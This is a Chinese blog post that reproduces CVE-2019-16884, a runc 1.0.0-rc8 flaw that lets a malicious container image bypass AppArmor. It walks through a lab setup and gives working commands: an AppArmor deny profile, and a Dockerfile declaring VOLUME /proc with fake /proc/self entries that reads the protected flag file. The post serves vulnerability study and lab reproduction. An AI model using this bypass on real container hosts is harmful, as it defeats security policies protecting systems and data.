CVE-2019-16884:Apparmor Restriction Bypass

最新推荐文章于 2024-06-01 09:48:20 发布
最新推荐文章于 2024-06-01 09:48:20 发布
阅读量3.1k 收藏
点赞数
文章标签: Dokcer逃逸 容器安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/122472714
版权

影响范围

runc 1.0.0-rc8

漏洞类型

容器逃逸漏洞

利用条件

影响范围应用

漏洞概述

在Docker 19.03. 2-ce和其他产品中使用的runc 1.0.0-rc8允许绕过AppArmor限制,因为libcontainer/rootfs_linux.go错误地检查装载目标,攻击者可以在容器镜像中可以声明一个VOLUME并挂载至/proc,之后欺骗runc使其认为AppArmor已经成功应用从而绕过AppArmor策略,该漏洞由Adam Iwaniuk发现并在DragonSector CTF 2019期间披露,这个CTF题目挑战将一个文件挂载到/flag-<random>,并使用AppArmor策略拒绝访问该文件,选手可以利用这个漏洞来禁用这个策略并读取文件

漏洞环境

构建实验环境:

docker run -it ssst0n3/docker_archive:CVE-2019-16884

ubuntu login: root
Password: root

 

漏洞复现

Step 1:创建apparmor规则

cat > /etc/apparmor.d/no_flag <<EOF
#include <tunables/global>

profile no_flag flags=(attach_disconnected,mediate_deleted) {
  #include <abstractions/base>
  file,
  deny /flag r,
}
EOF

 Step 2:创建一个flag文件

echo "Al1ex is comming" > /tmp/flag

 Step 3:应用规则

/sbin/apparmor_parser --replace --write-cache /etc/apparmor.d/no_flag

 Step 4:启动一个正常镜像此时无权限读取/flag内容

docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag busybox cat /flag
cat: can't open '/flag': Permission denied

 Step 4:利用漏洞启用一个恶意镜像,可以读取/flag

mkdir -p rootfs/proc/self/{attr,fd}
touch rootfs/proc/self/{status,attr/exec}
touch rootfs/proc/self/fd/{4,5}

cat <<EOF > Dockerfile
FROM busybox
ADD rootfs /
    
VOLUME /proc
EOF

docker build -t apparmor-bypass .
    
docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag apparmor-bypass cat /flag
Al1ex is comming!!!
docker: Error response from daemon: cannot start a stopped process: unknown.

安全建议

升级到最新版本

参考链接

https://github.com/opencontainers/runc/issues/2128

1757214 – (CVE-2019-16884) CVE-2019-16884 runc: AppArmor/SELinux bypass with malicious image that specifies a volume at /proc

FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
红队攻防渗透技术实战流程:云安全之云原生安全:内核漏洞和版本漏洞
HACKONE的博客
05-21 558
常规检测:https://github.com/teamssix/container-escape-check。检测利用:https://github.com/cdk-team/CDK。-CVE-2020-15257 containerd逃逸。4、实验获取到docker搭建的Web权限后进行逃逸。#云原生-Docker安全-容器逃逸&CDK自动化。#云原生-Docker安全-容器逃逸&内核漏洞。#云原生-Docker安全-容器逃逸&版本漏洞。-CVE-2019-5736 runC容器逃逸
Cpanel PHP Restriction Bypass Vulnerability 0day
cnbird's blog
09-02 748
Cpanel PHP Restriction Bypass Vulnerability 0day
Android Runtime Restrictions Bypass
Tesi1a的充电桩
03-30 1122
0x00背景 Twitter上quark实验室分享了一篇绕过Android高版本运行时限制绕过的方案,我们来分析Google对于Android运行时的限制 和quark实验室给出的bypass方案。 0x01 Android Runtime限制 1. dlopen() restrictions 从 Android 7.0 开始,系统将阻止应用动态链接非公开 NDK 库,这种库可能会导致您的应用崩...
探索Android运行时限制绕过:Android Runtime Restrictions Bypass
最新发布
gitblog_00083的博客
06-01 311
探索Android运行时限制绕过:Android Runtime Restrictions Bypass 项目地址:https://gitcode.com/quarkslab/android-restriction-bypass 1、项目介绍 在移动安全领域,Android系统的安全特性是开发者和研究人员关注的焦点。这个开源项目 [Android Runtime Restrictions Bypa...
安全-云原生基于容器漏洞的逃逸自动化手法(CDK check)
告白的博客
11-01 1844
上面可以看到逃逸的种类的以及其中的方法很多,但是实际环境中,是时间紧任务重,一步步的尝试逃逸难免有些费事,这里列举两种工具,CDK和check,集成了自动逃逸方法检测,CDK还集成了对应的poc实现一键逃逸,满足下列的版本时候,可以尝试该docker漏洞逃逸提权,详细的实验过程这里不作赘述,相关的操作网上也有大量的文章,但是实际的环境去逃逸,还是就事论事,会有许多的其他情况发生。CDK的自动化逃逸中包含了挂载,特权等许多的自动化利用,上述的两种逃逸类型为docker的漏洞,分别是。
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述版本8.4.0之前的Jira中的/ ...
sudo-cve-2019-18634:CVE-2019-18634的概念证明
03-21
**sudo CVE-2019-18634 概念证明** sudo(Superuser DO)是Linux和Unix系统中的一个命令行工具,允许普通用户以超级用户(root)或其他用户的身份执行命令,通常用于管理系统。这个概念证明是关于CVE-2019-18634...
CVE-2019-12814:CVE-2019-12814
05-26
**CVE-2019-12814:Jackson数据绑定库的远程代码执行漏洞** CVE-2019-12814是一个针对Java Jackson数据绑定库的重大安全漏洞,该漏洞允许攻击者通过恶意构造的JSON输入在解析过程中执行任意代码,从而可能导致系统...
CVE-2019-2725:WebLogic不安全反序列化-CVE-2019-2725有效负载生成器和漏洞利用
04-25
CVE-2019-2725 WebLogic Universal Exploit-CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729有效负载生成器和利用信息/帮助$ python3 weblogic_exploit.py -h====================================...
仅此记录-ubuntu docker启动报错:write /proc/self/attr/apparmor/exec: no such file or directory: unknown
qq_37902466的博客
03-20 652
解决办法:1、如果没有安装apparmor,需要执行sudo apt-get install apparmor。3、执行sudo service apparmor restart。4、执行sudo service docker restart。2、有安装的话,删除apparmor,重新安装。在本服务器中,重启docker容器时,出现了以上的错误。本环境通过以上的操作步骤成功解决该问题。
cve-2019-6341漏洞复现
玄道的网安博客
09-26 1538
简介 Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成 影响版本 在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。 环境搭建 使用vulhub快速搭建环境 cd vulhub/drupal/CVE-2019-6341/ docker-compose up -d 访问your-ip:8080 ...
CVE-2019-5786漏洞复现
qq_40334963的博客
02-28 1907
漏洞影响范围: CVE-2019-5786适用于Windows 7 x86的Chrome 72.0.3626.119稳定FileReader UaF攻击。 环境 kali win7 x86 Google_Chrome_(32bit)_v72.0.3626.119 复现 kali启动msf,搜索chrome_filereader利用模块 root@kali:~# msfconsole -q msf5...
CVE-2019-5418漏洞复现
千寻的博客
01-07 4567
CVE-2019-5418漏洞复现 0x00 漏洞介绍 Ruby on Rails是一个web应用程序框架,是相对较新的web应用程序框架 构建在Ruby语言上 0x01漏洞原理 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{({{闭合模板路径)头来...
cve-2019-9766引出的缓冲区漏洞学习
zwish的信安之路
06-25 1558
通过工程实践引出的缓冲区溢出,缓冲区溢出 缓冲区攻击的最终目的就是希望系统能执行这块可读写内存中已经被蓄意设定好的恶意代码。 1、栈的结构 1、先进后出。 2、在内存中表现为从高地址往低地址增长。 3、栈顶:栈的最上方(低地址区)。 4、栈低:栈的最下方(高地址区)。 基本的进程地址空间分布: 2、基本栈溢出: 缓冲区溢出示意图: 如果在数据段(右边的data)就保存了一系列的指令的二进制代码...
安卓绕过隐藏api限制
tcsupreme的博客
06-13 5212
安全设置 出于测试目的,Google 内置了一种在给定 Android 设备上全局禁用隐藏 API 限制的方法。标题为如何启用对非 SDK 接口的访问的问题中链接中的部分。说如下: 您可以通过使用以下 adb 命令更改 API 强制策略来启用对开发设备上的非 SDK 接口的访问: adb shell settings put global hidden_api_policy_pre_p_apps 1 adb shell settings put global hidden_api_policy_p_app
docker启动容器报错:container init caused \“write /proc/self/attr/keycreate: permission denied\““: unknown.
河静
03-02 1505
在启动gitlab容器的时候,报如下错误: 关闭selinux即可
CVE-2019-19781 Citrix漏洞:远程代码执行详解与检测
"本文将深入探讨CVE-2019-19781漏洞,该漏洞影响了Citrix Application Delivery Controller(ADC)和Citrix Gateway,可能导致远程代码执行(RCE)。我们将分析漏洞的成因、检测方法以及利用示例,帮助读者了解其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值